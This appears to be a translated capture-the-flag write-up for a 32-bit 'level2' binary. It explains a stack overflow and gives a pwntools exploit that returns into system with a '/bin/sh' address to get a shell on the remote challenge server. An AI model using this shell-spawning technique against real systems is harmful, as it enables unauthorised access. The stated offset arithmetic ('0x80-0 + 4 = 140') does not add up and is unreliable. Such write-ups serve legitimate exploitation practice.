File Download:
Links: https://pan.baidu.com/s/1jiR84G8Ji3luscmYTOOKAA
extraction code: jz7n
0x01. Analysis
checksec:
32 program, open NX.
Source:
Found that the system calls the system, but the parameters are not / bin / sh, followed by a read function, there is a stack overflow, we continue to look to see if there are bin / sh:
Really exist.
Get the address of bin / sh, and finally determine just what the offset:
Since this program does not know why then can not quit gdb in normal, it may be the cause of system calls, specifically not very clear, but we can manually calculate:
It should be 0x80-0 + 4 = 140. (0 refers to the length of example esp, ebp size is 4).
0x02.exp
##!/usr/bin/env python
from pwn import*
r=remote("111.198.29.45",47065)
#r=process('./level2')
system_adr=0x08048320
bin_sh_adr=0x0804A024
payload=140*'A'+p32(system_adr)+p32(0)+p32(bin_sh_adr)
r.recvuntil(":")
r.sendline(payload)
r.interactive()
